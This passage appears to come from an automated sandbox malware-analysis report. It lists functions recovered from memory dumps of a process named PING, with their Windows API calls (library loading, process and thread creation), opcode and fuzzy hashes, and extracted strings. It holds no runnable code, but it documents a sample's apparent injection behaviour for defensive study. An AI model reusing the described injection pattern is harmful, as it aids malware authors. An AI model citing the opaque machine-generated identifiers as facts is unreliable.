                                                      • Instruction Fuzzy Hash: F60126B6A563093EFF20E7F46C46FE763ACAF84210F0040D5A84CDB182E52195508BA4
                                                      Function 030943E0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 03094452
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3297787952.0000000003080000.00000040.80000000.00040000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_3080000_PING.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Load
                                                      • String ID:
                                                      • API String ID: 2234796835-0
                                                      • Opcode ID: c839b24bd16572aed6a7051c7c2bbafa6a578f71075491fecf3231fa6de0353c
                                                      • Instruction ID: 91648e861e8d8675adc9dd29a44604d3f8ffd7209816d019ac3f24339d3e8d92
                                                      • Opcode Fuzzy Hash: c839b24bd16572aed6a7051c7c2bbafa6a578f71075491fecf3231fa6de0353c
                                                      • Instruction Fuzzy Hash: D20184B9E0120DBBDF10DBE4EC41FDDB3B89B44208F0481A5EA189B280F670EB15CB91
                                                      Function 030A83F0 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateProcessInternalW.KERNELBASE(?,?,?,?,03097CE3,00000010,?,?,?,00000044,?,00000010,03097CE3,?,?,?), ref: 030A8453
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3297787952.0000000003080000.00000040.80000000.00040000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_3080000_PING.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateInternalProcess
                                                      • String ID:
                                                      • API String ID: 2186235152-0
                                                      • Opcode ID: 35b01c1212d585122ab2bc1ded5d023e9505cf5357cb9f81e14728261203d902
                                                      • Instruction ID: daab46f576c57f86d6ae320abcac573d0e0cfda7919803709c062870a282e239
                                                      • Opcode Fuzzy Hash: 35b01c1212d585122ab2bc1ded5d023e9505cf5357cb9f81e14728261203d902
                                                      • Instruction Fuzzy Hash: E301D2B6204209BFCB04DF8DDC80EEB77ADAF8C754F408208BA09E7240D630F8518BA4
                                                      Function 03089640 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 03089685
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3297787952.0000000003080000.00000040.80000000.00040000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_3080000_PING.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateThread
                                                      • String ID:
                                                      • API String ID: 2422867632-0
                                                      • Opcode ID: 19535f65b1070463ed8ee25af8bd2ca6c75952863c7127500a4beb3463429a41
                                                      • Instruction ID: 1cd7a8c3a51955a3ce8834149d514226a68a6646894267397c23316297f1d59f
                                                      • Opcode Fuzzy Hash: 19535f65b1070463ed8ee25af8bd2ca6c75952863c7127500a4beb3463429a41
                                                      • Instruction Fuzzy Hash: 38F0307724170436D220B6E9AC02FD7B69CDB80B61F150025F64DDA1C0D992B44143E8
                                                      Function 0308963A Relevance: 1.5, APIs: 1, Instructions: 34threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 03089685
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3297787952.0000000003080000.00000040.80000000.00040000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_3080000_PING.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateThread
                                                      • String ID:
                                                      • API String ID: 2422867632-0
                                                      • Opcode ID: 957c278ceb3319304d674fff95232ab587aff1413fd347f50b46867f1bb6586d
                                                      • Instruction ID: 0c1287183107c0a70b88b474c21307a7fd7bc175a06d2c921e9b2360e6d711b6
                                                      • Opcode Fuzzy Hash: 957c278ceb3319304d674fff95232ab587aff1413fd347f50b46867f1bb6586d
                                                      • Instruction Fuzzy Hash: 55F0657624170436D230B6E9DC02FD77698DFC0760F154019FA499F2C1D9A2B84183E8
                                                      Function 030A8310 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(03091609,?,030A4C23,03091609,030A4657,030A4C23,?,03091609,030A4657,00001000,?,?,030A9BE0), ref: 030A834C
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3297787952.0000000003080000.00000040.80000000.00040000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_3080000_PING.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      • Opcode ID: b7f2757ac2d67da2e220e558bac8420130ef538032ac032da27c65484dfab29d
                                                      • Instruction ID: e870cd2f601dad30d9b552a45d8d83c457f492501e14bb5d3983a976a01ec5e5
                                                      • Opcode Fuzzy Hash: b7f2757ac2d67da2e220e558bac8420130ef538032ac032da27c65484dfab29d
                                                      • Instruction Fuzzy Hash: E8E065766442087BE614EE98DC41FEB33ADEFC8710F004418FA08AB242C670B8118BF8
                                                      Function 030A8360 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RtlFreeHeap.NTDLL(00000000,00000004,00000000,000038B9,00000007,00000000,00000004,00000000,03093CBA,000000F4,?,?,?,?,?), ref: 030A839C
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3297787952.0000000003080000.00000040.80000000.00040000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_3080000_PING.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FreeHeap
                                                      • String ID:
                                                      • API String ID: 3298025750-0
                                                      • Opcode ID: 0112f9322e6f1835dd35a6fc29f2826ad6aaf91cfcf238a7f57362f68a7b31ae
                                                      • Instruction ID: f1eaf0bb56ba806ba2a7658a9494c84aed7c4c34798c1667fec8abc61ddb069a
                                                      • Opcode Fuzzy Hash: 0112f9322e6f1835dd35a6fc29f2826ad6aaf91cfcf238a7f57362f68a7b31ae
                                                      • Instruction Fuzzy Hash: E0E03975640608BBD614EA58DC41EEB33ACEFC5710F004418FA08AB241CA30B8108AB5
                                                      Function 03097B30 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetErrorMode.KERNELBASE(00008003,?,?,030918F0,030A6D77,030A4657,?), ref: 03097B63
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3297787952.0000000003080000.00000040.80000000.00040000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_3080000_PING.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorMode
                                                      • String ID:
                                                      • API String ID: 2340568224-0
                                                      • Opcode ID: da98180e7634d194589408875651a3a2623d42d674483f08f4c07e3d0359be56
                                                      • Instruction ID: 6965aaa4880d497ca6f99ed973e4b3b895fe311142cbf47520a79c5aa3837360
                                                      • Opcode Fuzzy Hash: da98180e7634d194589408875651a3a2623d42d674483f08f4c07e3d0359be56
                                                      • Instruction Fuzzy Hash: E4D05E7A6403087BF654F6E69C06F96368CAB80750F058464BA9CDB3C2EC56E01042A9
                                                      Function 03882C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3300263133.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                                      • Associated: 00000007.00000002.3300263133.0000000003939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3300263133.000000000393D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3300263133.00000000039AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_3810000_PING.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: fca81bb6758094ff6d04b17958d7d1162f31538698a887c2baadf782e822253b
                                                      • Instruction ID: 61dfe3f28fecd920ad6520eec8f37140209b9062e50be3e4db5aae14dee03f3e
                                                      • Opcode Fuzzy Hash: fca81bb6758094ff6d04b17958d7d1162f31538698a887c2baadf782e822253b
                                                      • Instruction Fuzzy Hash: F2B09B719015C5C9EE11F7A04A08717794567D1701F2DC4E2D303C645E4739C1D5E176

                                                      Non-executed Functions

                                                      Function 0366B6E9 Relevance: 56.5, Strings: 45, Instructions: 214COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3300020657.0000000003660000.00000040.00000800.00020000.00000000.sdmp, Offset: 03660000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_3660000_PING.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                      • API String ID: 0-3558027158
                                                      • Opcode ID: e0efaff55d48faa27f74e1d69c746340d0e7305bac7b92809636c045addcc8c6
                                                      • Instruction ID: 96383d9fcb738baa9080f183073f0e1436a0893fff175fad81f5da449cd43555
                                                      • Opcode Fuzzy Hash: e0efaff55d48faa27f74e1d69c746340d0e7305bac7b92809636c045addcc8c6
                                                      • Instruction Fuzzy Hash: AE914FF04083988AC7158F55A1612AFFFB1EBC6305F15816DE7E6BB243C3BE89058B85
                                                      Function 03882890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3300263133.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                                      • Associated: 00000007.00000002.3300263133.0000000003939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3300263133.000000000393D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3300263133.00000000039AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_3810000_PING.jbxd
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                      • API String ID: 48624451-2108815105
                                                      • Opcode ID: c16bf402d535f768106875a1a80bd0f01b79da10d04cad07ec68873e96e1c214
                                                      • Instruction ID: 1b912dd3a13f2bbd974e255aada0555e6e8c2525d9c9cae456c0b28f16a1124e
                                                      • Opcode Fuzzy Hash: c16bf402d535f768106875a1a80bd0f01b79da10d04cad07ec68873e96e1c214
                                                      • Instruction Fuzzy Hash: CC51B6B5A0011ABFDF24EBD8889097EF7B8BB4920071486E9E4A5D7741D278DE51CBE0
                                                      Function 03877630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 038B4742
                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 038B46FC
                                                      • ExecuteOptions, xrefs: 038B46A0
                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 038B4725
                                                      • Execute=1, xrefs: 038B4713
                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 038B4787
                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 038B4655
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3300263133.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                                      • Associated: 00000007.00000002.3300263133.0000000003939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3300263133.000000000393D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3300263133.00000000039AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_3810000_PING.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                      • API String ID: 0-484625025
                                                      • Opcode ID: 0bde9667ff5ac058c5948446600f96af834823fdce4e312077260b0726d30e16
                                                      • Instruction ID: d86f42ffebd4b0be5bbd2fae0ad298b9b0d247feb255a2866e1823b46de18f84
                                                      • Opcode Fuzzy Hash: 0bde9667ff5ac058c5948446600f96af834823fdce4e312077260b0726d30e16
                                                      • Instruction Fuzzy Hash: 6A51E735A003197AEF20EBE9DC85BFD77BAAB04304F1400E9E505EB281E771EA45CB51
                                                      Function 03662C2C Relevance: 10.0, Strings: 8, Instructions: 49COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3300020657.0000000003660000.00000040.00000800.00020000.00000000.sdmp, Offset: 03660000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_3660000_PING.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: DY[Z$E[$K3KZ$QX\E$[BK,$[EZ[$[[Z[$^E[K
                                                      • API String ID: 0-1533702992
                                                      • Opcode ID: 810e1de402e608b77b273fe881e42eaf7011821b1344b84983ce2ac31e57bb81
                                                      • Instruction ID: 0bd23b37e6c51b57436c28803f35dae6d2b7a79e80a9ba3a0467d70dfa61d108
                                                      • Opcode Fuzzy Hash: 810e1de402e608b77b273fe881e42eaf7011821b1344b84983ce2ac31e57bb81
                                                      • Instruction Fuzzy Hash: 4C11F2B0C14A4C8AEB25DFD4E5886DEFBB0FB04309F205158C06A7F295CB79954ACB85
                                                      Function 0388B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3300263133.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                                      • Associated: 00000007.00000002.3300263133.0000000003939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3300263133.000000000393D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3300263133.00000000039AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_3810000_PING.jbxd
                                                      Similarity
                                                      • API ID: __aulldvrm
                                                      • String ID: +$-$0$0
                                                      • API String ID: 1302938615-699404926
                                                      • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                      • Instruction ID: 764cebb482963a57e3baf4553fd2308e458a05d176caf75832413a9de5dff8eb
                                                      • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                      • Instruction Fuzzy Hash: B981BC70E052499BDF26FFE8C8917AEBBA1AFC5360F1C46DAD861E7391C6349840CB51
                                                      Function 0386F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • RTL: Re-Waiting, xrefs: 038B031E
                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 038B02BD
                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 038B02E7
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3300263133.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                                      • Associated: 00000007.00000002.3300263133.0000000003939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3300263133.000000000393D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3300263133.00000000039AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_3810000_PING.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                      • API String ID: 0-2474120054
                                                      • Opcode ID: fb095f3e56f263de0a255ccb2d8655dae9c1fe2ea0af6c567c234f9d8f5150a0
                                                      • Instruction ID: ddf065d11dbab4927dfa20dd64fce8f90ea985e09c83927cc4986b9c9539e311
                                                      • Opcode Fuzzy Hash: fb095f3e56f263de0a255ccb2d8655dae9c1fe2ea0af6c567c234f9d8f5150a0
                                                      • Instruction Fuzzy Hash: DCE1AD706087429FD725CFA8D884B6AB7E0BB89318F180A9DF6A5CB3D1D774D844CB52
                                                      Function 0387BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • RTL: Resource at %p, xrefs: 038B7B8E
                                                      • RTL: Re-Waiting, xrefs: 038B7BAC
                                                      • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 038B7B7F
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3300263133.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                                      • Associated: 00000007.00000002.3300263133.0000000003939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3300263133.000000000393D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3300263133.00000000039AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_3810000_PING.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                      • API String ID: 0-871070163
                                                      • Opcode ID: d876b86ef706990aaec0c44293ec103858bb94ca86e9d170e63eb39e2ed03e2e
                                                      • Instruction ID: 3bc4cd3b3c4753e60f1aaf1911a970da1ce8122d5f6255a0456d01747aca8328
                                                      • Opcode Fuzzy Hash: d876b86ef706990aaec0c44293ec103858bb94ca86e9d170e63eb39e2ed03e2e
                                                      • Instruction Fuzzy Hash: CD41E3353007469FDB25DEA8C840B6AB7E7EF89710F140A9DF95ADB380DB31E4068B91
                                                      Function 0387B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 038B728C
                                                      Strings
                                                      • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 038B7294
                                                      • RTL: Resource at %p, xrefs: 038B72A3
                                                      • RTL: Re-Waiting, xrefs: 038B72C1
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3300263133.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                                      • Associated: 00000007.00000002.3300263133.0000000003939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3300263133.000000000393D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3300263133.00000000039AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_3810000_PING.jbxd
                                                      Similarity
                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                      • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                      • API String ID: 885266447-605551621
                                                      • Opcode ID: 6da6edb09183977e42c8e99dbd4336bfe67f2a640255f27df34f940d1eb3f1e1
                                                      • Instruction ID: da4a4329f67ab53f743392e62314cd4cf6643976e6fd22d1153fb78682d34f0d
                                                      • Opcode Fuzzy Hash: 6da6edb09183977e42c8e99dbd4336bfe67f2a640255f27df34f940d1eb3f1e1
                                                      • Instruction Fuzzy Hash: 8541EF35600346ABD721DEA4CC41BAAB7B6FF84714F180699F9A6EB340DB31E942C7D1
                                                      Function 03887D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3300263133.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                                      • Associated: 00000007.00000002.3300263133.0000000003939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3300263133.000000000393D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3300263133.00000000039AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_3810000_PING.jbxd
                                                      Similarity
                                                      • API ID: __aulldvrm
                                                      • String ID: +$-
                                                      • API String ID: 1302938615-2137968064
                                                      • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                      • Instruction ID: 60d8aebe1ff4b24c05916ae39b04606133b09d3d4a5b3c90d2f708c73d1bf2ba
                                                      • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                      • Instruction Fuzzy Hash: E591A271E0021A9BDF24EFEAC8806BEB7B5AF44724F78459AF865E72C4D7309940C721
                                                      Function 03849126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3300263133.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                                      • Associated: 00000007.00000002.3300263133.0000000003939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3300263133.000000000393D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3300263133.00000000039AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_3810000_PING.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $$@
                                                      • API String ID: 0-1194432280
                                                      • Opcode ID: 53071baa37e4d636d0f3f230afa0cb3f1a6e46df0c709c23e3eab6a5e0af907d
                                                      • Instruction ID: f7507b9bec8c78004f906bf28edc0007415c6a0d9dd654828a5dc2d2ca7d4fe1
                                                      • Opcode Fuzzy Hash: 53071baa37e4d636d0f3f230afa0cb3f1a6e46df0c709c23e3eab6a5e0af907d
                                                      • Instruction Fuzzy Hash: 3E8129B5D002699BDB31DB98CC44BEEB6B8AF08710F0445EAE919F7640D7709E84CFA1
                                                      Function 038CCEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • @_EH4_CallFilterFunc@8.LIBCMT ref: 038CCFBD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3300263133.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                                      • Associated: 00000007.00000002.3300263133.0000000003939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3300263133.000000000393D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3300263133.00000000039AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_3810000_PING.jbxd
                                                      Similarity
                                                      • API ID: CallFilterFunc@8
                                                      • String ID: @$@4Qw@4Qw
                                                      • API String ID: 4062629308-2383119779
                                                      • Opcode ID: 56155e1e631efced7ce43af1d0bd93e60e2ab3826fbf5f0490c268d8890b6723
                                                      • Instruction ID: f58227c3d838e742b8f9029c2518ef15365de472fbfca9516c3701d8cd3bf32a
                                                      • Opcode Fuzzy Hash: 56155e1e631efced7ce43af1d0bd93e60e2ab3826fbf5f0490c268d8890b6723
                                                      • Instruction Fuzzy Hash: 9E418BB5910258DFCB21EFE9C880AAEBBB8AF45B00F0444AAE915DB254E774D805CB65